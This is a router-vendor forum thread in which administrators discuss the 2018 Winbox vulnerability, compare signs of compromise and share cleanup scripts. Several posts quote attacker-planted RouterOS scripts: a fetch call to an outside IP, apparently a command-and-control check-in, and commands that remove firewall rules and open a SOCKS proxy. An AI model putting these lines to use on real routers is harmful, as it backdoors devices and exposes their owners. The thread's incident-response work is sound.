Scripts named "ip" and "script3_" saw one instance of something like "script1". Of those scripts.... some did not contain mikrotik.php at all.
So keep that in mind when "looking for signs"

Re: Winbox vulnerability: please upgrade

Posted: Sun Aug 05, 2018 8:37 pm
by 43north
Thats it! THX!

In scripts are
/tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http
Does anyone have the contents of the payload they can post? I've tried hitting the above but it's 404ing now.

Thanks
I grabbed the PHP file before fixing my router. I opened it with notepad and it was completely blank......

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 06, 2018 8:30 am
by normis
It's disappointing that both the httpd vulnerability
We did fix and send on day one.

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 06, 2018 9:43 am
by msatter
It's disappointing that both the httpd vulnerability
We did fix and send on day one.
This is referring to this post: viewtopic.php?f=21&t=137572#p678156

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 06, 2018 10:35 am
by rushlife
According to changelog it is fixed
What's new in 6.40.8 (2018-Apr-23 11:34):

!) winbox - fixed vulnerability that allowed to gain access to an unsecured router;
So why would they post this again if it was fixed in April?
do you can read ?

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 06, 2018 11:14 am
by msatter
According to changelog it is fixed
What's new in 6.40.8 (2018-Apr-23 11:34):

!) winbox - fixed vulnerability that allowed to gain access to an unsecured router;
So why would they post this again if it was fixed in April?
do you can read ?

THEN, IS THIS CLEAR INFORMATION? All versions from 6.29 (release date: 2015/28/05) to 6.42 (release date 2018/04/20) are vulnerable. Is your device affected? and ...the same vulnerability in the RouterOS Winbox service, that was patched in RouterOS v6.42.1 in April 23, 2018.

To me this is also obsolete and confusing information, one had to know what the status is on the second of August and the rest is history. Give information about the current required version you have to be not vulnerable and that has to be on top and repeated in the text. This required version can be even higher than the one on the 2018/04/23.

The bugfix is on 6.40.8, also vulnerable if you look at the text above. However the release date is 2018/04/23. This is confusing and you if you don't go and read the blog you woul'd not know what the status is of 6.40.8.

All those postings about 6.40.8 could have been not posted if only the TS had given complete and clear information.

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 06, 2018 11:15 am
by normis
Well, the linked blog does include this information
Versions that include a fix: 6.40.8 [bugfix] or 6.42.1 [current] released on 25-mar-2018
We have added more details, so that it is more clear:

https://blog.mikrotik.com/security/winb ... ility.html

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 06, 2018 11:42 am
by dada
We have added more details, so that it is more clear:

https://blog.mikrotik.com/security/winb ... ility.html
thanks, it is much more clear now. Except that the 6.28 version is vulnerable too. I am able to read usernames/passwords from boards with this version using winbox vulnerability exploit code...

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 06, 2018 12:43 pm
by DummyPLUG
As other said make a CVE for each vulnerability, it is easier to know if we are taking about the same thing.
for example right now we know which winbox vulnerability we are talking about just because there is only one, if there is another one in future how can we know which one we are talking about? Winbox vulnerability 2017 &20xx?

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 06, 2018 12:46 pm
by kobuki
We have added more details, so that it is more clear:
https://blog.mikrotik.com/security/winb ... ility.html
It would be really useful to bump that post with today's date and tag with (UPDATED) or something.

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 06, 2018 1:30 pm
by msatter
Well, the linked blog does include this information
Versions that include a fix: 6.40.8 [bugfix] or 6.42.1 [current] released on 25-mar-2018
We have added more details, so that it is more clear:

https://blog.mikrotik.com/security/winb ... ility.html
I did write that the blog did contain that information about 6.40.8 and it is much clearer and that pleases me.

Don't distribute the information over different platform without having all having the same information.

I an not that harsh because I like to be so. I want that Mikrotik will give their customers beter product experience and security.

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 06, 2018 3:56 pm
by msatter
We have added more details, so that it is more clear:

https://blog.mikrotik.com/security/winb ... ility.html
thanks, it is much more clear now. Except that the 6.28 version is vulnerable too. I am able to read usernames/passwords from boards with this version using winbox vulnerability exploit code...
Please e-mail Mikrotik support with your findings on support@mikrotik.com so they can have a look into that. It will not have any impact on the advise to which minimal required RouterOS version have to be used.

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 06, 2018 3:57 pm
by msatter
It looks that an CVE has been created and I don't know enough about if it is done by the one who discovered this vulnerability of by Mikrotik self. The CVE number is: CVE-2018-14847

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 06, 2018 4:09 pm
by normis
CVE numbers don't have owners or publishers. Yes, you can use that CVE number to refer to this vulnerability. We will try to make numbers for any next vulnerability, if such would be discovered.

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 06, 2018 5:52 pm
by awacenter
We detect these issues and we try to update and upgrade all mikrotik devices.
Besid of this, we block all source IP via BGP when we can inform to our ISP.

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 06, 2018 8:17 pm
by honzam
We will try to make numbers for any next vulnerability, if such would be discovered.
I hope no :)

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 06, 2018 9:56 pm
by BrianHiggins
Is there anymore detailed information than the old blog post? I've seen numerous routers running 6.40.8 bugfix get compromised in the last few days. Winbox was externally accessible. On Friday I updated a couple older routers that had not yet been compromised that weren't on 6.40.8 to 6.40.8, only too find those routers compromised today. I've now updated nearly everything to 6.42.6 current and restricted 8291 to only the range of external IPs that need access, and so far I haven't seen any re-compromised routers.


Changes I've found in compromised routers

/system logging action
memory-lines set to 1

/ip socks
enabled, port set, connection timeout changed, max connections increased

/ip firewall filter
input chain tcp allow rule to match socks port
drop rules disabled on all chains

/system scripts
one or more scripts added
first script seen calls tool fetch to download files
second script seen makes all changes seen above except memory-lines=1, unclear when / how that's set

/system scheduler
one or more schedules added to call scripts mentioned

/user
add service user account

Other users I've spoken with report finding an empty mikrotik.php text file in /file, though I didn't encounter that myself.

One interesting thing I noted was that the only routers I found compromised were also routers running additional services or with NAT rules exposing services. I'm guessing they didn't scan for 8291, they instead scanned for something else to build the list of IPs to target. every single router that was otherwise locked down without any services beside 8291 exposed regardless of build number remained uncompromised. Might just be a coincidence, but was worth noting.

EDIT, added sample of scripts found on one of the routers.
/system script
add name=script4_ owner=service policy=ftp,reboot,read,write,policy,test,password,sensitive source=\
    "/tool fetch address=95.154.216.167 port=2008 src-path=/mikrotik.php mode=http keep-result=no"
add name="port 39593" owner=admin policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon source="/ip firewall filter remove [/ip firewall filter find where comment ~ \"port [0-9]*\"];/ip socks set enabled=yes port=39593 max-connections=255 connection-idle-timeout=60;/ip socks access remove [/ip socks access find];/ip firewall filter add chain=input protocol=tcp port=39593 action=accept comment=\"port 39593\";/ip firewall filter move [/ip firewall filter find comment=\"port 39593\"] 1;"

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 06, 2018 10:48 pm
by tippenring
Is there anymore detailed information than the old blog post? I've seen numerous routers running 6.40.8 bugfix get compromised in the last few days. Winbox was externally accessible. On Friday I updated a couple older routers that had not yet been compromised that weren't on 6.40.8 to 6.40.8, only too find those routers compromised today.
The conclusion that your routers were not compromised prior to the upgrade to 6.40.8 is invalid. The correct conclusion is that there was no *apparent* indication of compromise. I'll bet you didn't change the admin passwords when you upgraded to 6.40.8. Is that correct? Assuming no password change, someone connected to your router some time ago and downloaded the admin credentials. They only recently logged in and changed your configuration.
I've now updated nearly everything to 6.42.6 current and restricted 8291 to only the range of external IPs that need access, and so far I haven't seen any re-compromised routers.
Restricting admin access to only known good source IPs is a good practice. You could also look at port knocking if you need more flexibility.

Re: Winbox vulnerability: please upgrade

Posted: Tue Aug 07, 2018 12:27 am
by gotsprings
Is there anymore detailed information than the old blog post? I've seen numerous routers running 6.40.8 bugfix get compromised in the last few days. Winbox was externally accessible. On Friday I updated a couple older routers that had not yet been compromised that weren't on 6.40.8 to 6.40.8, only too find those routers compromised today.
The conclusion that your routers were not compromised prior to the upgrade to 6.40.8 is invalid. The correct conclusion is that there was no *apparent* indication of compromise. I'll bet you didn't change the admin passwords when you upgraded to 6.40.8. Is that correct? Assuming no password change, someone connected to your router some time ago and downloaded the admin credentials. They only recently logged in and changed your configuration.
I've now updated nearly everything to 6.42.6 current and restricted 8291 to only the range of external IPs that need access, and so far I haven't seen any re-compromised routers.
Restricting admin access to only known good source IPs is a good practice. You could also look at port knocking if you need more flexibility.
I looked over the log of another installers router.

[admin@MikroTik] /log> print
jul/06 21:10:09 system,info verified routeros-arm-6.42.5.npk
jul/06 21:10:09 system,info installed routeros-arm-6.42.5

jul/16 12:00:50 system,info,account user admin logged in from 194.40.240.254 via winbox
jul/16 12:00:53 system,info,account user admin logged in from 194.40.240.254 via telnet
jul/16 12:00:54 system,info socks config changed by admin
jul/16 12:00:55 system,info filter rule added by admin
jul/16 12:00:55 system,info filter rule moved by admin
jul/16 12:00:56 system,info,account user admin logged out from 194.40.240.254 via winbox
jul/16 12:00:56 system,info,account user admin logged out from 194.40.240.254 via telnet

jul/24 21:58:07 system,info,account user admin logged in from 185.153.198.228 via winbox
jul/24 21:58:10 system,info,account user admin logged in from 185.153.198.228 via telnet
jul/24 21:58:11 system,info user service added by admin
jul/24 21:58:11 system,info filter rule removed by admin
jul/24 21:58:12 system,info socks config changed by admin
jul/24 21:58:13 system,info filter rule added by admin
jul/24 21:58:13 system,info filter rule moved by admin
jul/24 21:58:14 system,info,account user admin logged out from 185.153.198.228 via winbox
jul/24 21:58:14 system,info,account user admin logged out from 185.153.198.228 via telnet

When they updated they didn't change the password.

Re: Winbox vulnerability: please upgrade

Posted: Tue Aug 07, 2018 1:12 am
by tippenring

When they updated they didn't change the password.
No, the attacker didn't change the password. If he did, that would give away that the router had been compromised. The attacker didn't want you to know he had the admin password for the router. So, you upgraded software, but did not change the password that the attacker obtained when you were running the vulnerable version.

Re: Winbox vulnerability: please upgrade

Posted: Tue Aug 07, 2018 1:38 am
by gotsprings
Tippenring.

I was agreeing with you. The logs were proof that 2 different attackers had the password from before the upgrade

Re: Winbox vulnerability: please upgrade

Posted: Tue Aug 07, 2018 5:36 am
by aswin
I have one remote router (CCR1009 v6.40.7) which infected with "sys" virus/spyware version 30RC9 on 2Aug. This spyware lock my "admin" account to readonly and create "sys account as full read/write policy and also lock the allowed address login from 127.0.0.1 only. The script also change the time of reformat-hold-button+reformat-hold-button-max in every second
I use the exploit which can get the "sys" password but I don't know how to login to router and reset them to factory configuration. Can I use the serial port to console login or need to reset nand gate chip?
https://ibb.co/gsfc0e
https://ibb.co/nHDKwK
https://ibb.co/d0RuVe
https://ibb.co/b44RbK
https://ibb.co/cww03z

Re: Winbox vulnerability: please upgrade

Posted: Tue Aug 07, 2018 7:12 am
by tippenring
Tippenring.

I was agreeing with you. The logs were proof that 2 different attackers had the password from before the upgrade
I misunderstood your post. My apologies.

Re: Winbox vulnerability: please upgrade

Posted: Tue Aug 07, 2018 8:08 am
by normis
I have one remote router (CCR1009 v6.40.7) which infected with "sys" virus/spyware version 30RC9 on 2Aug. This spyware lock my "admin" account to readonly and create "sys account as full read/write policy and also lock the allowed address login from 127.0.0.1 only. The script also change the time of reformat-hold-button+reformat-hold-button-max in every second
I use the exploit which can get the "sys" password but I don't know how to login to router and reset them to factory configuration. Can I use the serial port to console login or need to reset nand gate chip?
https://ibb.co/gsfc0e
https://ibb.co/nHDKwK
https://ibb.co/d0RuVe
https://ibb.co/b44RbK
https://ibb.co/cww03z
1) Wait, so you have the "sys" password? What is it? I think it will be useful for others to find out too.
2) Just log in with Winbox username "sys" and the password that you found. What is the question?

Re: Winbox vulnerability: please upgrade

Posted: Tue Aug 07, 2018 8:22 am
by grusu
As far as I can see in the first picture, the sys user can log only from IP 127.0.0.1 so you can only try from the serial port.

Re: Winbox vulnerability: please upgrade

Posted: Tue Aug 07, 2018 9:26 am
by aswin
I have one remote router (CCR1009 v6.40.7) which infected with "sys" virus/spyware version 30RC9 on 2Aug. This spyware lock my "admin" account to readonly and create "sys account as full read/write policy and also lock the allowed address login from 127.0.0.1 only. The script also change the time of reformat-hold-button+reformat-hold-button-max in every second
I use the exploit which can get the "sys" password but I don't know how to login to router and reset them to factory configuration. Can I use the serial port to console login or need to reset nand gate chip?
https://ibb.co/gsfc0e
https://ibb.co/nHDKwK
https://ibb.co/d0RuVe
https://ibb.co/b44RbK
https://ibb.co/cww03z
1) Wait, so you have the "sys" password? What is it? I think it will be useful for others to find out too.
2) Just log in with Winbox username "sys" and the password that you found. What is the question?
1. I have try to read this topic viewtopic.php?f=2&t=131166&p=646273&hil ... ys#p646273 but no success because of newer spyware version I just google from internet and there are exploits which can use the mikrotik vulnerability to get mikrotik password with easily (python + script + destination IP). So I just understand why this bug can spread too fast to many mikrotik router which not patch to safe baseline version. (including me 555)
https://ibb.co/jh2Siz

2. I have try to login to remote mikrotik with that password but no success so I think the problem come from the hacker allow only IP 127.0.0.1 to login with "sys" account.
And the hacker use script to disable hard reset, so I just ask can I use the serial cable to login. (infected router is still locate on other place)

Re: Winbox vulnerability: please upgrade

Posted: Tue Aug 07, 2018 9:29 am
by Jotne
The title of this thread is some misleading:
Winbox vulnerability: please upgrade
It looks like Winbox is the problem, not the RouterOS.
It does not help to upgrade the Winbox :)

Re: Winbox vulnerability: please upgrade

Posted: Tue Aug 07, 2018 9:42 am
by normis
The title of this thread is some misleading:
Winbox vulnerability: please upgrade
It looks like Winbox is the problem, not the RouterOS.
It does not help to upgrade the Winbox :)
This is why sometimes reading is important. Quote:
vulnerability in the RouterOS Winbox service, that was patched in RouterOS
Steps to be taken: Upgrade RouterOS to the latest release
It is really so hard to read more than the first 4 words?

Re: Winbox vulnerability: please upgrade

Posted: Tue Aug 07, 2018 9:46 am
by Jotne
- Implement a good firewall according to the article here: https://wiki.mikrotik.com/wiki/Manual:S ... our_Router
When you setup a default NAT, it looks like that all service port are blocked from the outside.
Do I still need to specify for where Windbox should be allowed?
/ip service set winbox address=192.168.88.0/24
I only have two user on the net, me and my wife :)

Also when I do secure http and winbox services using IP, I can not see any log from the RouterOS that someone not on that IP(range) tries to log inn. This should be logged as I can do with a normal FW/Nat/Mangle rule. I would then be able to see if my security upgrade does help me!!

Re: Winbox vulnerability: please upgrade

Posted: Tue Aug 07, 2018 4:48 pm
by gotsprings
- Implement a good firewall according to the article here: https://wiki.mikrotik.com/wiki/Manual:S ... our_Router
When you setup a default NAT, it looks like that all service port are blocked from the outside.
Do I still need to specify for where Windbox should be allowed?
/ip service set winbox address=192.168.88.0/24
I only have two user on the net, me and my wife :)

Also when I do secure http and winbox services using IP, I can not see any log from the RouterOS that someone not on that IP(range) tries to log inn. This should be logged as I can do with a normal FW/Nat/Mangle rule. I would then be able to see if my security upgrade does help me!!
Add this to your firewall.

/ip firewall filter add chain=input src-address=!192.168.88.0/24 proto=tcp dst-port=8291 action=passthrough log=yes log-prefix="Winbox External Probe" place-before=1

That would give you a counter and log entry

Re: Winbox vulnerability: please upgrade

Posted: Tue Aug 07, 2018 8:06 pm
by kobuki
2. I have try to login to remote mikrotik with that password but no success so I think the problem come from the hacker allow only IP 127.0.0.1 to login with "sys" account.
And the hacker use script to disable hard reset, so I just ask can I use the serial cable to login. (infected router is still locate on other place)
If you haven't figured it out yet, you could try connecting to 127.0.0.1 on your router using the socks service which has probably been enabled on your device by the attacker. That assumes you've already hacked the 'sys' user's password.

Re: Winbox vulnerability: please upgrade

Posted: Tue Aug 07, 2018 10:12 pm
by Jotne

/ip firewall filter add chain=input src-address=!192.168.88.0/24 proto=tcp dst-port=8291 action=passthrough log=yes log-prefix="Winbox External Probe" place-before=1

That would give you a counter and log entry
Thanks, did not think of that :)

Re: Winbox vulnerability: please upgrade

Posted: Wed Aug 08, 2018 2:11 am
by aswin
2. I have try to login to remote mikrotik with that password but no success so I think the problem come from the hacker allow only IP 127.0.0.1 to login with "sys" account.
And the hacker use script to disable hard reset, so I just ask can I use the serial cable to login. (infected router is still locate on other place)
If you haven't figured it out yet, you could try connecting to 127.0.0.1 on your router using the socks service which has probably been enabled on your device by the attacker. That assumes you've already hacked the 'sys' user's password.
Thank you kobuki for your suggestion. Perfect!! Now I can remote login to the infected router with user "sys" via SOCK
Thank you again. It can save a lot of time for me instead of requesting client to send router back to me .

Re: Winbox vulnerability: please upgrade

Posted: Wed Aug 08, 2018 2:17 am
by kobuki
Now I can remote login to the infected router with user "sys" via SOCK
Good! Thanks for the feedback. Your attacker was a particularly malicious one, almost locking you out completely. Almost.

Re: Winbox vulnerability: please upgrade

Posted: Wed Aug 08, 2018 2:41 am
by excession
Thats it! THX!

In scripts are
/tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http
Does anyone have the contents of the payload they can post? I've tried hitting the above but it's 404ing now.

Thanks
I grabbed the PHP file before fixing my router. I opened it with notepad and it was completely blank......
Interesting thanks, I wonder then if the empty file is just a byproduct of the fetch command and the point is to execute the PHP file on that web server rather than download it. Perhaps it’s part of the command and control system and by calling this file the router is checking in. Certainly such a call would provide a loggable IP address.

Re: Winbox vulnerability: please upgrade

Posted: Wed Aug 08, 2018 2:44 am
by kobuki
It was empty where I checked, too. It's possibly just a presence indicator in the swarm for the C&C as you also mentioned...

Re: Winbox vulnerability: please upgrade

Posted: Wed Aug 08, 2018 2:45 am
by excession
2. I have try to login to remote mikrotik with that password but no success so I think the problem come from the hacker allow only IP 127.0.0.1 to login with "sys" account.
And the hacker use script to disable hard reset, so I just ask can I use the serial cable to login. (infected router is still locate on other place)
If you haven't figured it out yet, you could try connecting to 127.0.0.1 on your router using the socks service which has probably been enabled on your device by the attacker. That assumes you've already hacked the 'sys' user's password.
Smart idea. Is he trying to use Winbox to connect and if so how would you route a Winbox connection through a socks proxy?

Re: Winbox vulnerability: please upgrade

Posted: Wed Aug 08, 2018 2:52 am
by 43north
It was empty where I checked, too. It's possibly just a presence indicator in the swarm for the C&C as you also mentioned...
As I mentioned my file was empty as well, makes sense with what you guys are saying.

Re: Winbox vulnerability: please upgrade

Posted: Wed Aug 08, 2018 3:00 am
by kobuki
Is he trying to use Winbox to connect
No idea, but possible.
how would you route a Winbox connection through a socks proxy?
I assume that's a rhetorical question.

Re: Winbox vulnerability: please upgrade

Posted: Wed Aug 08, 2018 3:19 am
by excession
Is he trying to use Winbox to connect
No idea, but possible.
how would you route a Winbox connection through a socks proxy?
I assume that's a rhetorical question.
Haha, actually no, just one based on an almost complete ignorance of socks!
I did just find some interesting discussion here: viewtopic.php?t=101874
I think I now understand: I imagine he used an ssh client to open the socks connection then ssh to connect to his router through that tunnel.

Re: Winbox vulnerability: please upgrade

Posted: Wed Aug 08, 2018 4:15 am
by aswin
2. I have try to login to remote mikrotik with that password but no success so I think the problem come from the hacker allow only IP 127.0.0.1 to login with "sys" account.
And the hacker use script to disable hard reset, so I just ask can I use the serial cable to login. (infected router is still locate on other place)
If you haven't figured it out yet, you could try connecting to 127.0.0.1 on your router using the socks service which has probably been enabled on your device by the attacker. That assumes you've already hacked the 'sys' user's password.
Smart idea. Is he trying to use Winbox to connect and if so how would you route a Winbox connection through a socks proxy?
From kobuki suggestion,I use http to login via sock not winbox.

Re: Winbox vulnerability: please upgrade

Posted: Wed Aug 08, 2018 12:26 pm
by blackzero
***

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 09, 2018 8:59 am
by sporkman
If you're curious how the bug works, this article is a good read:

https://n0p.me/winbox-bug-dissection/

The vulnerability would have been less of a problem if Mik used industry-standard password-hashing methods - since the vulnerability was allowing a remote attacker to download any file, and there's a file with a very weak encryption of the admin password, it makes getting a legit login really easy. If the password were properly encrypted, then the attacker would be out of luck or at best, have to spend lots of effort cracking the password. And the better your password was, the harder to crack...

The bit about how Winbox fetches unsigned DLLs from the router is frightening as hell. You have a signed app (Winbox) grabbing DLLs (unsigned) from the router - imagine what an attacker could do by loading a trojaned DLL onto your Winbox-running PC.

I also saw a new variation on a hacked router today - they had started a packet sniffer watching for port 20, 21, 110 and 143 traffic and sending it off to a listener on the host 37.1.207.114. Fun trick! Looking for any cleartext passwords I assume. If they were more adventurous, they'd grab 5060 UDP and make some free phone calls too.

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 09, 2018 10:25 am
by mrz
Winbox do not fetch DLLS for quite some time now. Do not use old winbox.

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 09, 2018 10:51 am
by sporkman
Winbox do not fetch DLLS for quite some time now. Do not use old winbox.
Don't tell me, tell the guy that wrote the blog post. He did see it happen in his tcpdump though, I don't think he wrote that more than 3-4 months ago.

Re: Winbox vulnerability: please upgrade

Posted: Tue Aug 14, 2018 12:11 am
by allstarcomps
Here is the script I wrote to clean up after IP-socks/user service attacked some of the old routers I have. After cleaning up it downloads the latest ROS and does a midnight reboot to install the latest ROS and firmware. I do recommend testing in a lab before deploying in production. I did not check for disabled drop rules.
/system logging action set memory-lines=1000 [find where name=memory]
/ip firewall filter remove [/ip firewall filter find where comment ~ "port [0-9]*"];
/ip socks set enabled=no port=1080 max-connections=200 connection-idle-timeout=00:02:00;
/ip socks access remove [/ip socks access find];
/system script remove [find where source~"mikrotik.php"]
/system script remove [find where source~"socks set enabled=yes"]
/system scheduler remove [find where name~"port"]
/system scheduler remove [find where owner="service"]
/user remove [find name=service]

/system scheduler
add name=midnightReboot on-event="/system reboot \r\
    \ny" start-time=23:59:00
/system scheduler
add name=updateFirmware on-event="/system scheduler remove [find where name=\"up\
    dateFirmware\"]\r\
    \n:delay 2s\r\
    \n/system scheduler remove [find where name=\"midnightReboot\"]\r\
    \n/system routerboard upgrade\r\
    \n:delay 10s\r\
    \n/system reboot\r\
    \ny" start-time=startup
/system package update download


Re: Winbox vulnerability: please upgrade

Posted: Wed Aug 22, 2018 7:04 pm
by CsXen
Hi.

When will you backport this vulnerability patches to the mipsle branch ? I want to upgrade our RB532's, RB133's every time, when I read this security warnings, but no .npk available. :)

Best regards: CsXen

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 23, 2018 9:28 am
by normis
Hi.

When will you backport this vulnerability patches to the mipsle branch ? I want to upgrade our RB532's, RB133's every time, when I read this security warnings, but no .npk available. :)

Best regards: CsXen
The v5 releases are NOT AFFECTED AT ALL. Quote from first post:
from 6.29
Also. Use firewall and you are safe. The vulnerability affects devices without any protection only.

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 23, 2018 9:43 am
by npyoung
How do you recover from this attack? We have 40 Dynadishes that are not responding to Winbox. They do respond partially on port 80, but act strangely. No SSL or telnet was enabled on these CPE's , so that approach is out. Any suggestions?

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 23, 2018 4:01 pm
by Deantwo
How do you recover from this attack? We have 40 Dynadishes that are not responding to Winbox. They do respond partially on port 80, but act strangely. No SSL or telnet was enabled on these CPE's , so that approach is out. Any suggestions?
You could use netinstall to reinstall them.
See: https://wiki.mikrotik.com/wiki/Manual:Netinstall

Other than that, you might get better help if you send an e-mail to support.
See: https://mikrotik.com/support

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 23, 2018 4:18 pm
by kobuki
They do respond partially on port 80, but act strangely.

What do you mean by that?

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 23, 2018 5:59 pm
by npyoung
They do respond partially on port 80, but act strangely.

What do you mean by that?
They are responding normally on port 80 now that I've put them behind a NAT, which I think should cut off access by the hacker. But, the username and/or password has been changed. Seems like there was a "service" entry in the users placed by the hack. Anyone know what the password is for that account?

More after hacking away. Most of them respond on port 80, and able to upgrade, turn off SOCKS, remove service user and change password. About 1/4 of them don't respond, indicate wrong user/pass, or show an error on the webpage. Noticed that the webserver from some are trying to place malicious code.

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 23, 2018 8:30 pm
by npyoung
How do you recover from this attack? We have 40 Dynadishes that are not responding to Winbox. They do respond partially on port 80, but act strangely. No SSL or telnet was enabled on these CPE's , so that approach is out. Any suggestions?
You could use netinstall to reinstall them.
See: https://wiki.mikrotik.com/wiki/Manual:Netinstall

Other than that, you might get better help if you send an e-mail to support.
See: https://mikrotik.com/support
Already did. Thanks for the heads up on Netinstall.

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 24, 2018 11:22 am
by CsXen
When will you backport this vulnerability patches to the mipsle branch ? I want to upgrade our RB532's, RB133's every time, when I read this security warnings, but no .npk available. :)
The v5 releases are NOT AFFECTED AT ALL. Quote from first post:
from 6.29

Don't forget, the last version was routeros-mipsle-6.33.5 on the MIPSLE branch, which is vulnerable. So must I downgrade to prior 6.29 to be safe?
(I can't firewall winbox port, because it must access from anywhere, from mobile or wired internet too. And I can't predict source IP... geoblocking would be a good solution. :) )

Best regards: CsXen

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 24, 2018 11:31 am
by mrz
Use VPN (like Ipsec) to connect to the router and allow Winbox access only from VPN.

Re: Winbox vulnerability: please upgrade

Posted: Sat Aug 25, 2018 6:22 am
by npyoung
They do respond partially on port 80, but act strangely.

What do you mean by that?
They are responding normally on port 80 now that I've put them behind a NAT, which I think should cut off access by the hacker. But, the username and/or password has been changed. Seems like there was a "service" entry in the users placed by the hack. Anyone know what the password is for that account?

More after hacking away. Most of them respond on port 80, and able to upgrade, turn off SOCKS, remove service user and change password. About 1/4 of them don't respond, indicate wrong user/pass, or show an error on the webpage. Noticed that the webserver from some are trying to place malicious code.
But wait, there's more. After three days of cutting the infected devices off from the mother ship (killing all incoming direct connections using NAT), most of the Dynadishes that wouldn't allow remote access to fix will respond favorably to Netinstall. However, I did run into one today that was rebooting cyclically in such a way that it wouldn't respond to power off, press reset, power on to put it in Netinstall mode. So, one scrap.

Re: Winbox vulnerability: please upgrade

Posted: Sat Aug 25, 2018 7:15 am
by mistry7
If the hacker has left the devices with old software, u can use the same Holes to get the set passwort, there are some Python scripts avaible for proof of concept.....

Re: Winbox vulnerability: please upgrade

Posted: Sat Aug 25, 2018 6:02 pm
by npyoung
If the hacker has left the devices with old software, u can use the same Holes to get the set passwort, there are some Python scripts avaible for proof of concept.....
Problem is that of the Dynadishes that are the hard nuts to crack (ie; not responding to Winbox as it's disabled by the hack, http doesn't work enough to get in, ssh and telnet turned off), there's no remote access to work with. It's interesting that some of these dishes, when presumably cut off from access to the mother ship by NAT degrade to cyclically rebooting every minute or so, and some others, seem to respond to a reboot and are nominally still running, even though they are infected.

BTW, what MT says about cleaning off the setup with a new one, absolutely true. Upgrading, changing passwords and rewinding the obvious stuff (second user "service", turning off SOCKS) just results in SOCKS being turned back on, and in the case of one router (in a remote area, wireless interface, which makes it hard to clean remotely), it went right back to a state where it cannot be connected to.

Re: Winbox vulnerability: please upgrade

Posted: Sat Aug 25, 2018 6:42 pm
by npyoung
Has anyone documented exactly what the hack does? Is it possible to expunge it completely without overwriting the device with a new clean restore file? When it comes to CPEs, the wireless interface precludes doing this remotely, as it's MAC doesn't match up with the MAC that the clean restore was generated on.

BTW, MT, feel free to jump in here. Perhaps some software to clean the attack off of infected devices?

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 27, 2018 8:47 am
by normis
Has anyone documented exactly what the hack does? Is it possible to expunge it completely without overwriting the device with a new clean restore file? When it comes to CPEs, the wireless interface precludes doing this remotely, as it's MAC doesn't match up with the MAC that the clean restore was generated on.

BTW, MT, feel free to jump in here. Perhaps some software to clean the attack off of infected devices?
Using the vulnerability described in the first post, somebody could get your password in clear text, if you had unprotected access to Winbox.
When the person has your password, there are any number of things he could do. The currently most widespread attack was by somebody who connected to such routers and added a SOCKS proxy configuration that runs some cryptomining script in your web browswer, when you hit a not-found 404 webpage.

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 27, 2018 9:18 am
by eider
To add to what @normis said - I've observed the same attack with SOCKS also attempting to send mass spam via port 25 (and only port 25) using From field in form of [random username]@[domain name from revdns]. The attack also added script and scheduler to run the script. Script was pointing at /mikrotik.php file, but as far as I can tell, it was empty. Possibly it was removed from attacker's server before I managed to check it or it was not used yet.

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 27, 2018 9:29 am
by mkx
Script was pointing at /mikrotik.php file, but as far as I can tell, it was empty. Possibly it was removed from attacker's server before I managed to check it or it was not used yet.
Regarding the empty mikrotik.php ... keep in mind that it's a PHP which gets executed on web server. It could well be that the point of that script on server is to receive data about owned router and after it processes the data (the most important is router's public IP address), it just returns empty page of type text/plain ... so don't get over confident just because local file seems to be empty.

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 27, 2018 10:51 am
by UGC
Hello, everyone. I have some ROS 5.26 still running for some reasons. Does this vulnerability affect 5.26?

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 27, 2018 10:53 am
by normis
Hello, everyone. I have some ROS 5.26 still running for some reasons. Does this vulnerability affect 5.26?
No. Like the first post says, it affects only versionns 6.26 and above (until the fixed versions, see first post)

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 27, 2018 11:08 am
by UGC
So, there is no need to upgrade it, if I am satisfied how it works?

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 27, 2018 11:15 am
by normis
Yes, but of course, you should do all the precautions regardless.

use non standart port and username, implement firewall and deny access from unknown addresses etc.

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 27, 2018 11:23 am
by UGC
Yes, I did all the precautions except the port. I will change it now. Thanks for the answer.

Re: Winbox vulnerability: please upgrade

Posted: Tue Aug 28, 2018 3:54 pm
by eider
keep in mind that it's a PHP which gets executed on web server. It could well be that the point of that script on server is to receive data about owned router and after it processes the data (the most important is router's public IP address), it just returns empty page of type text/plain
Yes. Monitoring of active exploited routers is obvious (in fact there's no even need for this to be PHP file, simple log analyzer would do the job), however the way script was made it could allow any commands from this file to be executed on exploited routers.

Re: Winbox vulnerability: please upgrade

Posted: Wed Aug 29, 2018 6:48 pm
by Chupaka
If the hacker has left the devices with old software, u can use the same Holes to get the set passwort, there are some Python scripts avaible for proof of concept.....
